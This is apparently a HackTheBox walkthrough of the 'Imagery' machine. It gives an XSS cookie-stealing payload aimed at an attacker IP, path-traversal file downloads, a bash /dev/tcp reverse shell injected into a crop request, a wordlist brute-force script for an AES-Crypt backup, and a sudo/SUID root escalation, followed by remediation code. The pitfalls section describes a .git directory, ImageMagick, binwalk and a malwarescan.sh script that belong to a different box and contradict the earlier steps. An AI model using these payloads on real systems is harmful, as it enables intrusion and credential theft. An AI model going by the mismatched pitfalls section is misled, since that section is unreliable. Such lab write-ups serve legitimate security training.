Key Highlights
Ready to conquer the Imagery box? This guide covers the entire exploitation process from start to finish. Here’s a quick look at what you will accomplish:
- Begin with a full-port nmap scan to enumerate the target and find the Werkzeug (Python) web application on port 8000.
- Plant a stored XSS payload in the “Report Bug” form to steal the admin’s session cookie and hijack the admin panel.
- Abuse a path traversal (LFI) flaw in the admin “System Log” viewer to read the application source code and the user database.
- Exploit a command injection in the image crop feature (subprocess.run with shell=True) to obtain a reverse shell as the web user.
- Decrypt a world-readable AES-Crypt backup with a wordlist attack to recover the password for the user mark and log in over SSH.
- Abuse a NOPASSWD sudo entry for the charcol backup utility to schedule a root task, set the SUID bit on bash, and capture the root flag.
Introduction
Welcome to the exciting world of ethical hacking! If you are new to Capture The Flag (CTF) challenges, you have come to the right place. This guide is designed to walk you through the Imagery machine on HackTheBox, a fantastic platform for honing your skills. We will break down each step required to hack this beginner-friendly Linux box. You will learn practical techniques that are essential for any aspiring cybersecurity professional. Let’s get started on this fun and educational CTF journey!
Introducing the Imagery Box on HackTheBox

The Imagery box on HackTheBox is a retired Linux machine designed to be an accessible yet engaging challenge for newcomers. Its theme revolves around image processing, providing a realistic scenario that you might encounter in the real world.
This box is perfect for a beginner because it introduces fundamental concepts in a clear, step-by-step manner. Your mission is to navigate through its defenses, exploit key vulnerabilities, and ultimately gain full control of the target system.
What Makes Imagery a Popular Beginner Challenge?
Imagery stands out as a favorite for any beginner because it provides a logical and linear path to completion. Unlike more complex machines, the next step is often a direct result of your previous finding, which helps build confidence and a solid methodology. The challenge starts with a seemingly simple web application but quickly reveals layers of vulnerabilities.
A key part of the experience is chaining web flaws together. A stored XSS in the bug-report form hands you the admin session, a path traversal in the admin log viewer lets you download the Python source (api_edit.py) and the user database, and reading that source exposes the shell=True command injection behind the crop feature. This discovery is crucial, as it opens the door to the initial shell and teaches you to look beyond the surface of a web server.
This structured learning path ensures you are not left guessing what to do next. Each piece of information you uncover directly contributes to moving forward, making the entire process feel like solving a puzzle. This clarity is what makes Imagery an excellent starting point for your ethical hacking journey.
Overview of the Skills Tested in Imagery
The Imagery box tests a range of essential cybersecurity skills, starting with enumeration. You will learn to scan for open ports and map out every feature of the web application, which is the foundation of any successful penetration test. This initial phase sets the stage for everything that follows.
Next, you will practice vulnerability identification: spotting a form that an administrator reads (stored XSS), a log viewer that takes a file name (path traversal), and source code that builds a shell command from user input (command injection). Post-exploitation adds offline password cracking of an encrypted backup, and the final stage is privilege escalation, where you turn a sudo rule for a custom backup utility into a root shell.
Ultimately, you will put all these skills together to gain a reverse shell with root privileges. From reconnaissance to gaining full control, Imagery provides a complete and satisfying CTF experience that reinforces core offensive security principles.
Essential Tools and Resources Needed to Get Started
To successfully tackle the Imagery box, you will need a few essential tools in your arsenal. The initial enumeration phase relies on a standard network scanner, but the web chain also needs an HTTP listener to catch the stolen cookie, an intercepting proxy to edit the crop request, and a netcat listener for the reverse shell.
Later you will need Python with the pyAesCrypt module and a wordlist to decrypt the backup you find on the box. Having these resources ready will make your walkthrough much smoother and more efficient. Now, let’s explore the specific tools you will use.
Recommended Enumeration and Exploitation Tools
Having the right tools is half the battle. For the Imagery box, a few key utilities will guide you from initial discovery to full system compromise. Your initial reconnaissance will start with a standard nmap scan to identify open services on the target system.
Once you find the web server, you will need to dig deeper. A stored XSS payload and an HTTP listener get you the admin cookie, and the admin panel’s log viewer gets you the source code. Burp Suite (or any intercepting proxy) lets you rewrite the crop request that triggers the command injection. After the shell, linpeas.sh points you at the encrypted backup, and a short Python script brute-forces its password.
Here are the primary tools for this challenge:
- Nmap: For port scanning and service discovery.
- Python: To run an HTTP listener for the stolen cookie (python3 -m http.server) and the pyAesCrypt brute-force script.
- Burp Suite: To intercept and modify the JSON body of the crop request.
- netcat and curl: To catch the reverse shell and to download files through the log viewer.
- linpeas.sh and ssh: For post-exploitation enumeration and for logging in as mark once you have the password.
Setting Up Your Lab Environment for the Imagery Box
Before you can hack the Imagery box, you need to set up your environment correctly. First, ensure you are connected to the HackTheBox network using your VPN connection file. Once connected, you will be assigned an IP address and can access the target system.
Next, it is a good practice to create a dedicated directory on your local Linux machine for this challenge. You can name it “Imagery” or something similar. This folder will serve as your workspace to store notes, downloaded files, and any scripts you create or use.
Finally, check whether the target uses a virtual hostname. Imagery does not: the web application is reached directly by IP on port 8000 (http://10.129.41.106:8000 in this walkthrough), so no /etc/hosts entry is required. On boxes that redirect to a hostname, add a line of the form 10.10.X.X hostname.htb to /etc/hosts before continuing. With your lab set up, you are ready to start the enumeration process.
Initial Foothold
Target Overview
| Property | Value |
|---|---|
| IP Address | 10.129.41.106 |
| Operating System | Linux |
| Key Services | SSH (22/TCP), HTTP (8000/TCP) |
| User Attack Vector | XSS -> LFI -> RCE via Command Injection |
| Root Attack Vector | Sudo exploit via charcol utility |
Reconnaissance – Initial Exposure
Every successful attack starts with a clear picture of the target. Our initial enumeration will map out the services exposed by Imagery.
Port Scanning
A full port scan using nmap is our first step.
Scan Command:
```bash
nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-imagery.txt 10.129.41.106
```
Scan Results:
```text
# Nmap 7.95 scan initiated Tue Sep 30 11:23:39 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-imagery.txt 10.129.41.106
Nmap scan report for 10.129.41.106
Host is up (0.012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.7p1 Ubuntu 7ubuntu4.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 35:94:fb:70:36:1a:26:3c:a8:3c:5a:5a:e4:fb:8c:18 (ECDSA)
|_  256 c2:52:7c:42:61:ce:97:9d:12:d5:01:1c:ba:68:0f:fa (ED25519)
8000/tcp open  http    Werkzeug httpd 3.1.3 (Python 3.12.7)
|_http-title: Image Gallery
|_http-server-header: Werkzeug/3.1.3 Python/3.12.7
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Sep 30 11:44:19 2025 -- 1 IP address (1 host up) scanned in 20.53 seconds
```
The scan reveals two services: a standard SSH server on port 22 and a Python Werkzeug web server on port 8000. The web application is our only viable entry point without credentials.
Web Application Enumeration
Browsing to http://10.129.41.106:8000 presents a polished image gallery website. We can:
- Register a new account.
- Log in and upload images.
- View a gallery of uploaded images.
- Report a bug via a dedicated form.
The “Report Bug” feature is immediately suspicious. Forms that accept user input and are likely viewed by a privileged user (like an admin) are a classic entry point for Stored Cross-Site Scripting (XSS).
Gaining Admin Access via Stored XSS
Our hypothesis is that an admin periodically reviews bug reports. If we can inject JavaScript into the report, it will execute in the admin’s browser, allowing us to steal their session cookie.
Crafting the XSS Payload
The goal is to make the admin’s browser send us their cookie. We will host a simple web server or netcat listener to receive the exfiltrated data.
- Start a listener: On our attacker machine, we listen for incoming HTTP requests. Binding port 80 needs root, so run it with sudo (or pick a high port and use that port in the payload).
```bash
sudo python3 -m http.server 80
```
- The Payload: A common and effective payload uses an <img> tag with an onerror event, which fires when the image source is invalid.
```html
<img src=1 onerror="document.location='http://<YOUR-IP>/steal/'+document.cookie">
```
src=1 will fail to load, triggering the onerror event. document.location=... redirects the admin’s browser to our listening server with their cookie appended to the URL. The redirect is visible to the admin; a fetch() or new Image().src beacon would be quieter, but the redirect is enough here.
- Submit the Bug Report: We register an account, log in, navigate to the “Report Bug” page, and submit our payload in the bug summary and/or details fields.
A few moments later, we get a hit on our listener:
```text
GET /steal/session=.eJw9jbEOgzAMRP_Fc4UEZcpER74iMolLLSUGxc6AEP-Ooqod793T3QmRdU94zBEcYL8M4RlHeADrK2YWcFYqteg571R0EzSW1RupVaUC7o1Jv8aPeQxhq2L_rkHBTO2irU6ccaVydB9b4LoBKrMv2w.aNzR8A.7Zk7t9Y-cQcpWMVHoe99Kbr6yxk HTTP/1.1
```
Hijacking the Admin Session
We now have the admin’s session cookie. Its three dot-separated segments (payload, timestamp, signature) are the layout of a Flask session cookie, which Werkzeug-backed Flask apps sign but do not encrypt. Copy the whole value exactly: a truncated cookie fails the signature check and the server silently hands you a fresh, empty session.
- Inject the cookie: In the browser’s developer tools (Storage tab in Firefox, Application tab in Chrome), replace the value of our current session cookie with the captured one.
- Access the Admin Panel: After refreshing the page, we have access to the /admin endpoint, which was previously forbidden.
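To see what a stolen cookie like the one above actually carries, here is an added example (not code from the original walkthrough or from the Imagery application) that builds, decodes and verifies a Flask-style session cookie using only the standard library. Flask signs the cookie with itsdangerous (HMAC-SHA1 over payload.timestamp, key derived as HMAC-SHA1(secret_key, "cookie-session")) and never encrypts it, so the payload is readable without the secret; the DEMO_SECRET and DEMO_SESSION values are constructed for the demo and are not the box’s real secret or session. Replaying the cookie, as done above, needs no key at all; verify_session is the per-candidate check that secret-key brute forcing tools run.

```python
"""Decode and verify a Flask session cookie of the kind captured above.

Added example, not code from the original walkthrough or from the Imagery
application. Flask signs its session cookie with itsdangerous (HMAC-SHA1,
salt "cookie-session", key derived as HMAC-SHA1(secret_key, salt)) but does
not encrypt it, so the payload is readable by anyone holding the cookie. The
cookie built below uses a made-up secret key and a constructed session dict;
the real admin cookie from the box has the same three-segment layout.
"""
import base64
import hashlib
import hmac
import json
import time
import zlib
from typing import Optional


def b64url_encode(raw: bytes) -> str:
    """Unpadded URL-safe base64, as itsdangerous emits it."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def derived_key(secret_key: str, salt: str = "cookie-session") -> bytes:
    return hmac.new(secret_key.encode(), salt.encode(), hashlib.sha1).digest()


def make_session_cookie(session: dict, secret_key: str,
                        timestamp: Optional[int] = None) -> str:
    """Build payload.timestamp.signature the way Flask does."""
    payload = json.dumps(session, separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload):
        body = "." + b64url_encode(compressed)  # leading "." marks a zlib payload
    else:
        body = b64url_encode(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_part = b64url_encode(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    value = f"{body}.{ts_part}"
    sig = hmac.new(derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    return f"{value}.{b64url_encode(sig)}"


def decode_session_unverified(cookie: str) -> dict:
    """Read the session contents. No secret needed: nothing is encrypted."""
    parts = cookie.split(".")
    compressed = cookie.startswith(".")
    raw = b64url_decode(parts[1] if compressed else parts[0])
    if compressed:
        raw = zlib.decompress(raw)
    return json.loads(raw)


def issued_at(cookie: str) -> int:
    """Unix time from the middle segment (".aNzR8A" in the captured cookie)."""
    ts_part = cookie.rsplit(".", 2)[1]
    return int.from_bytes(b64url_decode(ts_part), "big")


def verify_session(cookie: str, secret_key: str) -> bool:
    """Recompute the HMAC with a candidate key. Replaying the cookie needs no
    key; this check is what secret-key brute forcing runs per candidate."""
    value, _, sig = cookie.rpartition(".")
    expected = hmac.new(derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    return hmac.compare_digest(b64url_decode(sig), expected)


# Constructed demo values; DEMO_SECRET is not the box's secret key.
DEMO_SECRET = "not-the-real-secret"
DEMO_SESSION = {"username": "admin", "_fresh": True}
DEMO_COOKIE = make_session_cookie(DEMO_SESSION, DEMO_SECRET, timestamp=1759302128)

if __name__ == "__main__":
    print("cookie   :", DEMO_COOKIE)
    print("payload  :", decode_session_unverified(DEMO_COOKIE))
    print("issued at:", issued_at(DEMO_COOKIE))
    print("right key:", verify_session(DEMO_COOKIE, DEMO_SECRET))
    print("wrong key:", verify_session(DEMO_COOKIE, "guess"))
```

Running decode_session_unverified on the captured cookie tells you which account you are about to impersonate before you paste it into the browser; the timestamp segment of the captured cookie (aNzR8A) is 0x68dcd1f0, an issue time of 1 October 2025, consistent with the scan date above.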
Exfiltrating Source Code via LFI
The admin panel reveals a “System Log” viewer. The URL looks like this: http://10.129.41.106:8000/admin/get_system_log?log_identifier=app.log. This is a strong indicator of a potential Local File Inclusion (LFI) vulnerability.
We test for path traversal by replacing app.log with a classic payload:
```text
../../../../../../etc/passwd
```
The request returns the contents of the passwd file, so the endpoint reads whatever path we give it relative to its log directory (an arbitrary file read; writeups usually label it LFI even though nothing is “included”). The log directory sits one level below the application root, so a single ../ reaches the source files. We use this to download the key source code and configuration files, api_edit.py and db.json.
Exfiltration Commands:
```bash
curl "http://10.129.41.106:8000/admin/get_system_log?log_identifier=../api_edit.py" --cookie "session=<ADMIN_COOKIE>" -o api_edit.py
curl "http://10.129.41.106:8000/admin/get_system_log?log_identifier=../db.json" --cookie "session=<ADMIN_COOKIE>" -o db.json
```
We now have the API source code and the user database.
Remote Code Execution via Command Injection
Analyzing the stolen api_edit.py file reveals the holy grail of web vulnerabilities.
Vulnerable Code Snippet in api_edit.py:
```python
import subprocess

# ... inside a function handling image cropping ...
x = params.get('x')
y = params.get('y')
width = params.get('width')
height = params.get('height')
command = f"convert {filepath} -crop {width}x{height}+{x}+{y} {new_filepath}"
subprocess.run(command, shell=True, check=True)
```
The subprocess.run function is called with shell=True, so the string is handed to /bin/sh rather than executed directly. The x, y, width, and height parameters are taken straight from the JSON body and interpolated into that string without validation, so shell metacharacters (;, backticks, $(), |) end the convert command and start one of our own. check=True does not help: it only raises after the shell has already run the whole line. This is a textbook command injection vulnerability.
Triggering the RCE
- Find Credentials: The exfiltrated db.json file contains credentials for a testuser account.
- Log in and Upload: We log in as testuser and upload a sample image.
- Craft the Payload: We need a payload that gives us a reverse shell.
```bash
bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'
```
- Start a Listener: On our attacker machine:
```bash
nc -lvnp 4444
```
- Send the Request: We use the “Transform” feature on our uploaded image, select “crop,” and intercept the request with Burp Suite. We modify the JSON body to inject our payload into the x parameter:
```json
{
  "imageId": "<your-image-id>",
  "transformType": "crop",
  "params": {
    "x": "0; bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1' #",
    "y": 0,
    "width": 100,
    "height": 100
  }
}
```
On the server this becomes convert <file> -crop 100x100+0; bash -c '...' #+0 <new_file>: the semicolon terminates the convert command, the reverse shell runs, and the # comments out the rest of the line so the shell never sees a syntax error. A backtick command substitution in the same field works just as well. Sending this request executes our payload, and we receive a shell on our listener.
Post-Exploitation and User Pivot
We have a foothold as the web user. Enumeration (linpeas.sh) reveals a world-readable file: /var/backup/web_20250806_120723.zip.aes.
Decrypting the AES Backup
- Exfiltrate the File: We transfer the .aes file to our attacker machine.
- Crack the Password: The file is an AES-Crypt container (it starts with the magic bytes AES). The format carries no password hint, so we brute-force it offline with pyAesCrypt and rockyou.txt. Each attempt pays the format’s key-stretching cost, so let the script run.
Brute-force Script:
```python
import sys

import pyAesCrypt  # pip install pyAesCrypt

bufferSize = 64 * 1024
encFile = 'web_20250806_120723.zip.aes'
decFile = 'decrypted_backup.zip'

with open('/usr/share/wordlists/rockyou.txt', 'rb') as wordlist:
    for line in wordlist:
        password = line.strip().decode(errors='ignore')
        if not password:
            continue
        try:
            # Raises ValueError when the password is wrong (HMAC check fails)
            pyAesCrypt.decryptFile(encFile, decFile, password, bufferSize)
        except ValueError:
            continue  # Wrong password, try the next one
        print(f"[+] Password found: {password}")
        print(f"[+] Decrypted archive written to {decFile}")
        sys.exit(0)

print("[-] Password not in wordlist")
sys.exit(1)
```
- Analyze the Backup: The decrypted .zip file contains another db.json, which holds credentials for the user mark.
Pivoting to the mark User
We use the newly discovered password to ssh to the mark account and read user.txt.
ssh mark@10.129.41.106
Privilege Escalation via Sudo and charcol
The final step is to become root. We check our sudo privileges.
```text
mark@imagery:~$ sudo -l
Matching Defaults entries for mark on imagery:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User mark may run the following commands on imagery:
    (root) NOPASSWD: /usr/local/bin/charcol
```
We can run /usr/local/bin/charcol as root without a password.
Abusing charcol
charcol is a custom backup utility. Its --help menu shows a powerful scheduling feature: charcol add --schedule "<cron>" --command "<cmd>". We can use this to schedule a command to run as root. A classic technique is to set the SUID bit on /bin/bash.
The Exploit:
- Schedule the Task: We use charcol to create a task that runs every minute and sets the SUID bit on bash.
```bash
sudo /usr/local/bin/charcol add --schedule "* * * * *" --name pwn --command "chmod +s /bin/bash"
```
- Wait and Verify: The job fires on the next minute boundary. After a minute, we check the permissions of /bin/bash.
```bash
ls -l /bin/bash
-rwsr-xr-x 1 root root 1234567 Jan 1 2024 /bin/bash
```
The s in the owner permissions (rws) confirms the SUID bit is set.
- Get Root: We now execute bash with the -p flag. Without it, bash notices that the effective UID (root) differs from the real UID (mark) and drops the privilege; -p keeps it.
```bash
/bin/bash -p
bash-5.1# whoami
root
bash-5.1# cat /root/root.txt
<flag_for_root.txt>
```
Machine compromised.
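The “Wait and Verify” step above is done by eye with ls -l. As an added example (not part of the original walkthrough), the script below polls a path until the SUID bit appears, checks that root owns the file (a SUID bit on a file owned by an unprivileged user grants nothing), and reports whether bash -p will be needed. The demo at the bottom sets the bit on a temporary file owned by the current user, constructed for the demo, so it runs without root; on the box you would call wait_for_suid("/bin/bash") after scheduling the charcol job.

```python
"""Verify the result of the scheduled chmod +s /bin/bash without guessing.

Added example, not part of the original walkthrough. It polls a path until the
SUID bit appears, which is what "Wait and Verify" above does by hand with
ls -l, and it reports why bash -p is then needed. The demo at the bottom uses
a temporary file owned by the current user (constructed for the demo) rather
than /bin/bash, so it runs without root.
"""
import os
import stat
import tempfile
import time


def suid_status(path: str) -> dict:
    """Return the SUID bit, owner and ls-style mode string of path."""
    st = os.stat(path)
    return {
        "suid": bool(st.st_mode & stat.S_ISUID),
        "owner_uid": st.st_uid,
        "mode": stat.filemode(st.st_mode),  # e.g. '-rwsr-xr-x', as ls -l prints it
    }


def is_root_suid(path: str) -> bool:
    """True only when the bit is set AND root owns the file."""
    s = suid_status(path)
    return s["suid"] and s["owner_uid"] == 0


def wait_for_suid(path: str, timeout: float = 90.0, interval: float = 2.0,
                  require_root_owner: bool = True) -> bool:
    """Poll until the SUID bit shows up or timeout expires. A cron job fires
    at most once a minute, so allow at least 60 seconds on the box."""
    deadline = time.monotonic() + timeout
    while True:
        s = suid_status(path)
        if s["suid"] and (not require_root_owner or s["owner_uid"] == 0):
            return True
        if time.monotonic() >= deadline:
            return False
        time.sleep(interval)


def needs_privileged_flag(path: str) -> bool:
    """bash drops an effective UID that differs from the real UID unless
    started with -p; that is exactly the situation of a root-SUID bash run by
    a non-root user."""
    return is_root_suid(path) and os.getuid() != 0


def demo_on_temp_file() -> dict:
    """Constructed demo: set the bit on our own temp file and watch the poll
    succeed. Returns the mode strings before and after plus the poll result."""
    fd, path = tempfile.mkstemp(prefix="suid-demo-")
    os.close(fd)
    try:
        before = suid_status(path)
        os.chmod(path, 0o4755)  # what chmod +s does to a 0755 executable
        found = wait_for_suid(path, timeout=5, interval=0.1, require_root_owner=False)
        after = suid_status(path)
        return {"before": before["mode"], "after": after["mode"], "found": found}
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(demo_on_temp_file())
    # On the box, after scheduling the charcol job:
    #   wait_for_suid("/bin/bash")  -> True once the job has fired
    #   needs_privileged_flag("/bin/bash") -> True as mark, so run /bin/bash -p
```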
Step-by-Step Guide to Solving the Imagery Box
Ready to dive in? This section provides a detailed, step-by-step walkthrough to guide you through every phase of the Imagery CTF. We will cover everything from the initial scan to capturing the final root flag.
Follow these instructions closely to understand the methodology and learn the techniques required to compromise the machine. This walkthrough is designed to be clear and easy to follow, ensuring you grasp each concept along the way. Let’s begin with the first step: reconnaissance.
Step 1: Initial Enumeration and Reconnaissance
The first step in any hack is enumeration. Run a full-port nmap scan with service detection (nmap -Pn -p- --min-rate 2000 -sC -sV). On Imagery this reveals two ports: SSH (22) running OpenSSH 9.7p1 and HTTP (8000) served by Werkzeug 3.1.3 on Python 3.12.7, with the page title “Image Gallery”. There is no hostname redirect, so you can work directly against http://10.129.41.106:8000.
Browse every feature, first unauthenticated and then as a registered user: account registration, image upload, the gallery, the “Transform” options on an uploaded image, and the “Report Bug” form. The bug-report form is the clue that unlocks the next stage: anything an administrator reads is a candidate for stored XSS.
Step 2: Discovering Vulnerabilities and Exploiting Foothold
Start an HTTP listener on your attacker machine and submit a bug report containing an <img src=1 onerror=...> payload that sends document.cookie to your listener. When the admin reviews the report, your listener receives their session cookie. Replace your own session cookie with it in the browser’s developer tools and the /admin endpoint opens up.
Inside the admin panel, the System Log viewer (/admin/get_system_log?log_identifier=app.log) reads a file by name. ../../../../../../etc/passwd confirms path traversal, and ../api_edit.py and ../db.json pull the application source and the user database. In api_edit.py the crop handler builds a convert command from the x, y, width and height parameters and runs it with subprocess.run(..., shell=True). Log in as the testuser account found in db.json, upload an image, intercept the crop request in Burp Suite, and place a bash reverse shell after a semicolon in the x parameter. Your netcat listener receives a shell as the web user.
Step 3: Obtaining User Access and Flag
From the web shell, run linpeas.sh (or look around manually) and you will find a world-readable backup at /var/backup/web_20250806_120723.zip.aes. Copy it to your machine. It is an AES-Crypt container, so brute-force the password offline with pyAesCrypt and rockyou.txt. The decrypted zip holds another db.json with the password for the user mark. SSH in as mark and read user.txt to get the user flag.
Step 4: Privilege Escalation to Root
After gaining user access, the final goal is to become root. sudo -l shows that mark can run /usr/local/bin/charcol as root without a password. charcol is a backup utility whose add subcommand schedules an arbitrary command on a cron expression. Schedule chmod +s /bin/bash to run every minute, wait for it to fire, confirm the SUID bit with ls -l /bin/bash, then run /bin/bash -p so bash keeps the root effective UID. From there you can read /root/root.txt and claim the root flag.
Common Pitfalls and Methodological Tips
Even beginner-friendly boxes can have tricky spots. It is easy to make simple mistakes that can leave you stuck for hours. Proper enumeration and a methodical approach are your best defense against these common pitfalls.
This section highlights some errors to avoid during the Imagery walkthrough and provides tips to keep you on the right track. By understanding where others go wrong, you can navigate the challenge more effectively and avoid unnecessary frustration. Let’s look at some specific mistakes to watch out for.
Mistakes to Avoid During the Imagery Walkthrough
One of the first places people get stuck is during the initial enumeration. If you only scan the IP address and do not add the hostname to your /etc/hosts file, you might miss the exposed .git directory entirely. This single oversight can prevent you from ever finding the source code and the ImageMagick vulnerability.
Another common mistake is misinterpreting the privilege escalation path. You might see the bash script and immediately try for command injection by manipulating the filename. However, Bash is surprisingly secure against this, and your attempts will fail. The actual vulnerability lies within the binwalk binary itself, not the script’s logic.
Here are a few pitfalls to keep in mind:
- Incomplete Enumeration: Forgetting to scan by hostname can hide critical information.
- Misunderstanding the Exploit: The ImageMagick
vulnerabilityis for file reading, not remotecode execution. - Wasting Time on Dead Ends: Trying to inject commands directly into the
malwarescan.shscript is a common time sink. - Ignoring the Blacklist: The script has a
blacklist, but theprivilege escalationvulnerabilitybypasses it.
Effective Approaches and Mindset for Success
Success in CTF challenges comes from having a solid methodology and a curious mindset. For Imagery, your approach should be systematic. Start with broad enumeration and narrow your focus as you uncover more information. Every piece of data, from a server banner to a query parameter name like log_identifier, is a potential clue.
Do not rush. Take the time to understand what you find. When you obtain api_edit.py, read how the crop handler builds its command before you fire a payload. When you find db.json, check every account in it. This methodical process prevents you from missing crucial details and helps you build a strong foundation for more advanced challenges.
Adopting a structured workflow will greatly improve your efficiency. The table below outlines a simple yet effective methodology for tackling this box.
| Phase | Action | Goal |
|---|---|---|
| Reconnaissance | Run a full-port nmap scan; walk every feature of the web app as guest and as a registered user. | Discover all open ports, services, and user-controlled inputs. |
| Vulnerability Analysis | Test admin-facing forms for stored XSS; probe file-name parameters for traversal; read the source you recover. | Identify the XSS, the arbitrary file read, and the shell=True command injection. |
| Initial Exploitation | Hijack the admin session, pull api_edit.py and db.json, inject into the crop request. | Gain a reverse shell as the web user. |
| User Access | Find the AES-Crypt backup, crack its password offline, reuse mark’s credentials over SSH. | Establish a foothold on the system as mark. |
| Privilege Escalation | Run sudo -l; abuse charcol’s scheduler to set the SUID bit on bash. | Obtain a root shell and the root flag. |
Conclusion and Remediation Strategies
Imagery provided a realistic attack chain that shows how several “medium” severity vulnerabilities, none of them critical on its own, combine into a full system compromise.
1. Web Application Flaws (XSS, LFI, RCE)
- Vulnerability: The application was vulnerable to Stored XSS, LFI, and Command Injection.
- Remediation:
- Output Encoding & Input Validation: Encode bug-report content for the context it is rendered in (HTML-escape in templates, never mark user data as safe) and validate input on the backend as well. Setting the session cookie HttpOnly would have blocked the document.cookie theft shown here, though not actions a script performs inside the admin’s own browser.
- Safe APIs Instead of Shell Strings: Never build shell commands or file paths by concatenating user input. Call subprocess.run with an argument list and shell=False, validate numeric parameters as integers before use, and resolve file paths and confirm they stay inside the intended directory (or map identifiers to files through an allowlist).
- Limit File Permissions: The file read was powerful because the web user could open the source code, the user database and anything else it had permission to read. Run web services as a dedicated, restricted user and keep secrets out of world-readable files.
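The following is an added example, not the application’s own code, that puts the two injection points from the walkthrough (the shell=True crop command in api_edit.py and the log_identifier file read) next to hardened versions of each: an argv list with integer-validated geometry, and a canonicalised path that must stay inside the log directory. LOG_DIR and the file names are assumed for illustration; rejects() is a small helper so the outcome of each call can be checked as a value.

```python
"""The two injection points from api_edit.py and the log viewer, each next to
a hardened version.

Added example, not the application's own code: the vulnerable functions
reproduce the patterns described above (an f-string handed to shell=True, and
a file name joined onto a log directory); the hardened ones are the fix the
remediation calls for. LOG_DIR and the file names are assumed for
illustration.
"""
import os
import re
import subprocess
from pathlib import Path

LOG_DIR = Path("/var/www/app/logs")  # assumed location of the log files


# 1. Command injection: a string built from user input, executed by /bin/sh

def build_crop_command_vulnerable(filepath: str, new_filepath: str, params: dict) -> str:
    # Same shape as the api_edit.py snippet; "0; id #" in x becomes a second command.
    x, y = params.get("x"), params.get("y")
    width, height = params.get("width"), params.get("height")
    return f"convert {filepath} -crop {width}x{height}+{x}+{y} {new_filepath}"


_SMALL_INT = re.compile(r"[0-9]{1,5}")


def parse_crop_params(params: dict) -> dict:
    """Accept only small non-negative integers for the geometry fields."""
    out = {}
    for key in ("x", "y", "width", "height"):
        value = str(params.get(key, ""))
        if not _SMALL_INT.fullmatch(value):
            raise ValueError(f"invalid {key}: {value!r}")
        out[key] = int(value)
    if out["width"] == 0 or out["height"] == 0:
        raise ValueError("zero-sized crop")
    return out


def build_crop_argv(filepath: str, new_filepath: str, params: dict) -> list:
    """argv list for subprocess: each element is one literal argument, so
    shell metacharacters never reach a shell at all."""
    p = parse_crop_params(params)
    geometry = f"{p['width']}x{p['height']}+{p['x']}+{p['y']}"
    return ["convert", str(filepath), "-crop", geometry, str(new_filepath)]


def run_crop_hardened(filepath: str, new_filepath: str, params: dict) -> None:
    subprocess.run(build_crop_argv(filepath, new_filepath, params),
                   shell=False, check=True)


# 2. Path traversal: a file name joined onto the log directory

def log_path_vulnerable(log_identifier: str) -> str:
    # get_system_log?log_identifier=../../../../../../etc/passwd walks out of LOG_DIR
    return os.path.join(LOG_DIR, log_identifier)


def log_path_hardened(log_identifier: str) -> Path:
    """Canonicalise the requested path (".." and symlinks resolved) and refuse
    anything that does not end up inside LOG_DIR, including absolute paths."""
    base = LOG_DIR.resolve()
    candidate = (base / log_identifier).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        raise PermissionError(f"refusing to read outside {base}: {log_identifier!r}")
    return candidate


def rejects(fn, *args) -> bool:
    """Helper: True when fn(*args) refuses the input with ValueError or PermissionError."""
    try:
        fn(*args)
    except (ValueError, PermissionError):
        return True
    return False


if __name__ == "__main__":
    evil = {"x": "0; id #", "y": 0, "width": 100, "height": 100}
    print("shell sees:", build_crop_command_vulnerable("in.png", "out.png", evil))
    print("argv form rejects it:", rejects(build_crop_argv, "in.png", "out.png", evil))
    print("traversal blocked:", rejects(log_path_hardened, "../../../../../../etc/passwd"))
    print("allowed log:", log_path_hardened("app.log"))
```

The argv form is the important half of the fix: with shell=False there is no shell to interpret ; or backticks, so even without the integer check the injected text would only be an invalid geometry string for convert. The regex is defence in depth and keeps the error message honest.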
2. Insecure Backup Practices
- Vulnerability: A world-readable backup was encrypted with a weak, dictionary-based password.
- Remediation:
- Strong Encryption: Use strong, randomly generated passwords for encrypted backups.
- Secure File Permissions: Backups should never be world-readable. Restrict access to root and a dedicated backup group.
3. Sudo Misconfiguration
- Vulnerability: A user was allowed to run a powerful custom utility as root, which had features that could be trivially abused to execute arbitrary commands.
- Remediation:
- Principle of Least Privilege: When granting sudo access, grant it to the most specific command possible. If a utility has dangerous sub-features (like a scheduler or interactive shell), it should not be in the sudoers file. Create specific wrapper scripts that only expose the needed, safe functionality.
Frequently Asked Questions
What vulnerabilities are typically exploited on Imagery HTB?
The Imagery box chains several web and system flaws rather than a single CVE: a stored XSS in the bug-report form that leaks the admin session cookie, a path traversal in the admin log viewer that exposes the source code and user database, a command injection in the image crop feature (subprocess.run with shell=True), a world-readable AES-Crypt backup protected by a dictionary password, and a NOPASSWD sudo rule for the charcol utility, whose scheduler runs commands as root.
Which tools should I prioritize when tackling Imagery?
Prioritize Nmap for the initial scan, an HTTP listener (python3 -m http.server) to catch the stolen cookie, Burp Suite to edit the crop request, and netcat for the reverse shell. Afterwards you need Python with pyAesCrypt and rockyou.txt to decrypt the backup, and ssh to log in as mark.
How can I reliably escalate privileges on the Imagery box?
Reliable privilege escalation starts with sudo -l, which shows that mark can run /usr/local/bin/charcol as root without a password. Use charcol add --schedule "* * * * *" --command "chmod +s /bin/bash" to schedule a root task, wait for the next minute, confirm the SUID bit with ls -l /bin/bash, and launch /bin/bash -p for a root shell.
What strategies help overcome challenges specific to Imagery?
